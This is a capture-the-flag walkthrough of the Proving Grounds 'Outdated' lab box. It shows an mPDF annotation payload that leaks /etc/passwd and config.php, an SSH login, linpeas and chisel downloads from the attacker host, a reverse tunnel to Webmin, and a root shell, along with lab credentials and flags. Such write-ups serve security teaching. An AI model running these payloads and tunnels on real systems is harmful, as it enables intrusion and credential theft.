Summary #
Get initial access using SSH and the provided credentials or through a Convert HTML to PDF Online site on port 80. Using exiftool we can determine that mPDF 6.0 is used in the conversion, for which an exploit is available that saves a file from the filesystem as a PDF attachment. Download config.php we get the same credentials as provided by OFFSEC. Once on the box we find that port 10000 is open and use chisel to forward this port to localhost port 10000. This provides access to the Webmin interface by reuse of credentials and allows for privilege escalation to the root user.
Specifications #
- Name: OUTDATED
- Platform: PG PRACTICE
- Points: 5
- Difficulty: Easy
- System overview: Linux outdated 5.4.0-136-generic #153-Ubuntu SMP Thu Nov 24 15:56:58 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.143.232
- OFFSEC provided credentials:
svc-account:best&_#Password@2021!!! - HASH:
local.txt:27775aba8d80e246da68b9c306ba4c59 - HASH:
proof.txt:49ff4abfed6efcf69fa250ea34a2ad41
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir outdated && cd outdated && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Aug 26 11:01 .
drwxrwxr-x 42 kali kali 4096 Aug 26 11:01 ..
drwxrwxr-x 2 kali kali 4096 Aug 26 11:01 enum
drwxrwxr-x 2 kali kali 4096 Aug 26 11:01 exploits
drwxrwxr-x 2 kali kali 4096 Aug 26 11:01 files
drwxrwxr-x 2 kali kali 4096 Aug 26 11:01 tools
drwxrwxr-x 2 kali kali 4096 Aug 26 11:01 uploads
## set bash variable
ip=192.168.143.232
## ping target to check if it's online
ping $ip
PING 192.168.143.232 (192.168.143.232) 56(84) bytes of data.
64 bytes from 192.168.143.232: icmp_seq=1 ttl=61 time=17.6 ms
64 bytes from 192.168.143.232: icmp_seq=2 ttl=61 time=17.0 ms
^C
--- 192.168.143.232 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 16.979/17.295/17.612/0.316 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.143.232:22
Open 192.168.143.232:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 11:02 CEST
Initiating Ping Scan at 11:02
Scanning 192.168.143.232 [4 ports]
Completed Ping Scan at 11:02, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:02
Completed Parallel DNS resolution of 1 host. at 11:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:02
Scanning 192.168.143.232 [2 ports]
Discovered open port 80/tcp on 192.168.143.232
Discovered open port 22/tcp on 192.168.143.232
Completed SYN Stealth Scan at 11:02, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.143.232
Host is up, received echo-reply ttl 61 (0.019s latency).
Scanned at 2025-08-26 11:02:24 CEST for 1s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH6PH1/ST7TUJ4Mp/l4c7G+TM07YbX7YIsnHzq1TRpvtiBh8MQuFkL1SWW9+za+h6ZraqoZ0ewwkH+0la436t9Q+2H/Nh4CntJOrRbpLJKg4hChjgCHd5KiLCOKHhXPs/FA3mm0Zkzw1tVJLPR6RTbIkkbQiV2Zk3u8oamV5srWIJeYUY5O2XXmTnKENfrPXeHup1+3wBOkTO4Mu17wBSw6yvXyj+lleKjQ6Hnje7KozW5q4U6ijd3LmvHE34UHq/qUbCUbiwY06N2Mj0NQiZqWW8z48eTzGsuh6u1SfGIDnCCq3sWm37Y5LIUvqAFyIEJZVsC/UyrJDPBE+YIODNbN2QLD9JeBr8P4n1rkMaXbsHGywFtutdSrBZwYuRuB2W0GjIEWD/J7lxKIJ9UxRq0UxWWkZ8s3SNqUq2enfPwQt399nigtUerccskdyUD0oRKqVnhZCjEYfX3qOnlAqejr3Lpm8nA31pp6lrKNAmQEjdSO8Jxk04OR2JBxcfVNfs=
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
| 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Convert HTML to PDF Online
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
Initial Access: path 1 #
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH6PH1/ST7TUJ4Mp/l4c7G+TM07YbX7YIsnHzq1TRpvtiBh8MQuFkL1SWW9+za+h6ZraqoZ0ewwkH+0la436t9Q+2H/Nh4CntJOrRbpLJKg4hChjgCHd5KiLCOKHhXPs/FA3mm0Zkzw1tVJLPR6RTbIkkbQiV2Zk3u8oamV5srWIJeYUY5O2XXmTnKENfrPXeHup1+3wBOkTO4Mu17wBSw6yvXyj+lleKjQ6Hnje7KozW5q4U6ijd3LmvHE34UHq/qUbCUbiwY06N2Mj0NQiZqWW8z48eTzGsuh6u1SfGIDnCCq3sWm37Y5LIUvqAFyIEJZVsC/UyrJDPBE+YIODNbN2QLD9JeBr8P4n1rkMaXbsHGywFtutdSrBZwYuRuB2W0GjIEWD/J7lxKIJ9UxRq0UxWWkZ8s3SNqUq2enfPwQt399nigtUerccskdyUD0oRKqVnhZCjEYfX3qOnlAqejr3Lpm8nA31pp6lrKNAmQEjdSO8Jxk04OR2JBxcfVNfs=
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
| 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
Because we got credentials (svc-account:best&_#Password@2021!!!) from OFFSEC we first try to login using SSH on TCP port 22. Connect with the following command and paste the password when asked. Once logged in we find in the root folder of the svc-account user the local.txt file.
## login using SSH with provided credentials: `svc-account:best&_#Password@2021!!!`
ssh svc-account@$ip
svc-account@192.168.143.232's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-136-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 26 Aug 2025 09:03:03 AM UTC
System load: 0.0 Processes: 214
Usage of /: 62.2% of 9.74GB Users logged in: 0
Memory usage: 30% IPv4 address for ens160: 192.168.143.232
Swap usage: 0%
0 updates can be applied immediately.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
svc-account@outdated:~$
## print current working directory
svc-account@outdated:~$ pwd
/home/svc-account
## list content current directory
svc-account@outdated:~$ ls -la
total 28
drwxr-xr-x 3 svc-account svc-account 4096 Aug 26 09:03 .
drwxr-xr-x 3 root root 4096 Jan 12 2023 ..
lrwxrwxrwx 1 svc-account svc-account 9 Jan 12 2023 .bash_history -> /dev/null
-rw-r--r-- 1 svc-account svc-account 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 svc-account svc-account 3771 Feb 25 2020 .bashrc
drwx------ 2 svc-account svc-account 4096 Aug 26 09:03 .cache
-rw------- 1 svc-account svc-account 33 Aug 26 08:55 local.txt
-rw-r--r-- 1 svc-account svc-account 807 Feb 25 2020 .profile
## print `local.txt`
svc-account@outdated:~$ cat local.txt
27775aba8d80e246da68b9c306ba4c59
Initial Access: path 2 #
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Convert HTML to PDF Online
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
When we visit http://192.168.143.232/ in the browser, we get a Convert HTML to PDF Online form.
When we enter test and click on Convert the text is converted to PDF. Saving the PDF gives it the name: mpdf.pdf. Let’s save it to the files directory.
Change directory and run exiftool to see more details on the generated PDF file.
## change directory
cd files
## run exiftool on `mpdf.pdf`
exiftool mpdf.pdf
ExifTool Version Number : 13.25
File Name : mpdf.pdf
Directory : .
File Size : 15 kB
File Modification Date/Time : 2025:08:26 11:04:23+02:00
File Access Date/Time : 2025:08:26 11:04:23+02:00
File Inode Change Date/Time : 2025:08:26 11:04:23+02:00
File Permissions : -rw-rw-r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Page Layout : OneColumn
Producer : mPDF 6.0
Create Date : 2025:08:26 10:04:14+01:00
Modify Date : 2025:08:26 10:04:14+01:00
We can see it’s created with: mPDF 6.0. When we search on internet we can find: https://github.com/mpdf/mpdf/issues/356, which tells about how to get LFI with adding a string to the provided text. The example given is /etc/passwd. Let’s add this to the text in the browser.
## add this content to text
The PDF is dark and full of attachments
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
It should look like this, and click on Convert.
Again, a PDF is created, but now with a attachment.
When we save the attachment (passwd) in the files directory we indeed see that the /etc/passwd was attached.
## change directory
cd files
## print `passwd` file
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
fwupd-refresh:x:113:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
svc-account:x:1000:1000::/home/svc-account:/bin/bash
But what now, let’s run a gobuster to see if there is anything interesting on the web application. Indeed, there is a config directory with the URL: http://192.168.143.232/config/. In this directory (looking in the browser), there is a file called: config.php. Let’s try to download this as done previously. Change the payload in the text and click on Convert, save the attachment and print it. This gives us the same credentials as provided by OFFSEC: svc-account:best&_#Password@2021!!!. Use SSH to connect to the target with the found credentials, get a shell as the svc-account user and print local.txt.
## run gobuster on the web application
gobuster dir -t 100 -u http://$ip:80/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt | tee enum/raft-large-dir-raw-80
tee: enum/raft-large-dir-raw-80: No such file or directory
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.143.232:80/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/config (Status: 301) [Size: 319] [--> http://192.168.143.232/config/]
<SNIP>
## payload adapted to the `./config/config.php` file
The PDF is dark and full of attachments
<annotation file="./config/config.php" content="./config/config.php" icon="Graph" title="Attached File: ./config/config.php" pos-x="195" />
## print `config.php`
cat config.php
<?php
/* todo: check if still required
$servername = "localhost";
$username = "svc-account";
$password = "best&_#Password@2021!!!";
$dbname = "project";
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
*/
## connect to the target with the found credentials
ssh svc-account@$ip
svc-account@192.168.143.232's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-136-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 26 Aug 2025 09:06:13 AM UTC
System load: 0.17 Processes: 218
Usage of /: 62.2% of 9.74GB Users logged in: 0
Memory usage: 33% IPv4 address for ens160: 192.168.143.232
Swap usage: 0%
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Aug 26 09:03:04 2025 from 192.168.45.237
svc-account@outdated:~$
## print `local.txt`
svc-account@outdated:~$ cat local.txt
2d551d21de176f6dfb9472a17167fddc
Privilege Escalation #
Let’s upload linpeas.sh to the target and run it.
## change directory locally
cd uploads
## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
## get local IP address on tun0
ip a | grep -A 10 tun0
7: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.237/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::5ec4:b9ef:93d2:8888/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start local webserver
python3 -m http.server 80
## on target
## download `linpeas.sh`
svc-account@outdated:~$ wget http://192.168.45.237/linpeas.sh
--2025-08-26 09:08:12-- http://192.168.45.237/linpeas.sh
Connecting to 192.168.45.237:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 956174 (934K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=============================================================>] 933.76K 5.28MB/s in 0.2s
2025-08-26 09:08:12 (5.28 MB/s) - ‘linpeas.sh’ saved [956174/956174]
## set the execution bit
svc-account@outdated:~$ chmod +x linpeas.sh
## run `linpeas.sh`
svc-account@outdated:~$ ./linpeas.sh
The linpeas.sh output shows there is port 1000 running on the target. We can verify this using the ss command. Let’s use chisel to port forward 10000 to our local port 10000. First we need to download chisel: https://github.com/jpillora/chisel/releases and copy it to the uploads directory.
##
svc-account@outdated:~$ ss -ant
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 0.0.0.0:10000 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
ESTAB 0 36 192.168.143.232:22 192.168.45.237:53758
SYN-SENT 0 1 192.168.143.232:48490 91.189.91.43:443
## change directory
cd uploads
## move file to `uploads` directory
mv ~/Downloads/chisel_1.10.1_linux_amd64.gz .
## gunzip this archive
gunzip chisel_1.10.1_linux_amd64.gz
## rename to `chisel`
mv chisel_1.10.1_linux_amd64 chisel
## set execution bit
chmod +x chisel
## get local IP address on tun0
ip a | grep -A 10 tun0
7: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.237/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::5ec4:b9ef:93d2:8888/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start local webserver
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
## run chisel server on port 9000
./chisel server --reverse -p 9000
2025/08/26 11:22:35 server: Reverse tunnelling enabled
2025/08/26 11:22:35 server: Fingerprint 6+mf3TLZDV0pODhSucbfzlUw/217OuZ7wwvqEmnXNF4=
2025/08/26 11:22:35 server: Listening on http://0.0.0.0:9000
## on target:
## download chisel
svc-account@outdated:~$ wget http://192.168.45.237/chisel
--2025-08-26 09:22:14-- http://192.168.45.237/chisel
Connecting to 192.168.45.237:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9371800 (8.9M) [application/octet-stream]
Saving to: ‘chisel’
chisel 100%[=============================================================>] 8.94M 8.19MB/s in 1.1s
2025-08-26 09:22:15 (8.19 MB/s) - ‘chisel’ saved [9371800/9371800]
## set execution bit
chmod +x chisel
## connect to chisel server and port forward 10000 to local 10000
svc-account@outdated:~$ ./chisel client 192.168.45.237:9000 R:10000:127.0.0.1:10000
2025/08/26 09:23:30 client: Connecting to ws://192.168.45.237:9000
2025/08/26 09:23:31 client: Connected (Latency 19.271847ms)
Now that the port forward is ready, go to the browser/URL on HTTPS: https://localhost:10000/ and see the login page for Webmin.
Default credentials don’t work, perhaps password reuse is done. Try: svc-account:best&_#Password@2021!!!. Indeed, we get logged in. Now click on the Command shell button to get a shell as the root user.
## print the current user
[svc-account@outdated ~]# whoami
root
## print `proof.txt`
[svc-account@outdated ~]# cat /root/proof.txt
49ff4abfed6efcf69fa250ea34a2ad41
References #
[+] https://github.com/mpdf/mpdf/issues/356
[+] https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
[+] https://github.com/jpillora/chisel/releases